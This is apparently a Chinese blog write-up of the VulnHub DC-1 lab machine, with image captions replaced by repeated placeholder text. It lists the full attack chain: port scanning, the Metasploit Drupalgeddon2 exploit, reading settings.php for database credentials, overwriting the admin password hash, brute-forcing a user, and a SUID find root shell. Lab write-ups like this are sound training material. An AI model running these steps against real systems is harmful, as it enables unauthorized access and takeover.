DC-1靶机

仅供个人娱乐

靶机信息

下载地址:https://download.vulnhub.com/dc/DC-1.zip

一、主机扫描

arp-scan  -l

nmap -p 1-65535 -A -sV 192.168.216.135

DC-1靶机

二、信息收集

DC-1靶机

dirb  http://192.168.216.135

DC-1靶机DC-1靶机

使用版本漏洞攻击

search drupal

DC-1靶机

msf5 > use 4

msf5exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.216.135

rhosts => 192.168.216.135

msf5exploit(unix/webapp/drupal_drupalgeddon2) > run

DC-1靶机DC-1靶机

得到shell

python -c 'import pty;pty.spawn("/bin/bash");'

DC-1靶机

信息收集

DC-1靶机DC-1靶机

www-data@DC-1:/var/www$ cd sites/default

cd sites/default

DC-1靶机

www-data@DC-1:/var/www/sites/default$ catsettings.php

ps aux | grep mysql

DC-1靶机

进入数据库

DC-1靶机

数据库信息收集

DC-1靶机DC-1靶机

密码都做了hash加密,解密不了

重置密码http://drupalchina.cn/node/1964

直接进入drupal的安装目录,然后运行命令

php ./scripts/password-hash.sh 12345

DC-1靶机

登录mysql修改密码

UPDATE users SET pass = '$S$DZyKe31ZRwS4msLQYHacPaiIpOZIwHsblIeObnCuz4o3OeGDMblJ' where uid = 1;

DC-1靶机

登录账户

信息收集

DC-1靶机DC-1靶机

爆破flag4后获得密码orange

flag4@DC-1:~$ touch getflag

flag4@DC-1:~$ find / -type f -name getflag-exec "whoami" \;

root

flag4@DC-1:~$ find / -type f -name getflag-exec "/bin/bash" \;

DC-1靶机

上一篇:Unity图集简介及使用


下一篇:cocos creator 优化之相机渲染 drawcall优化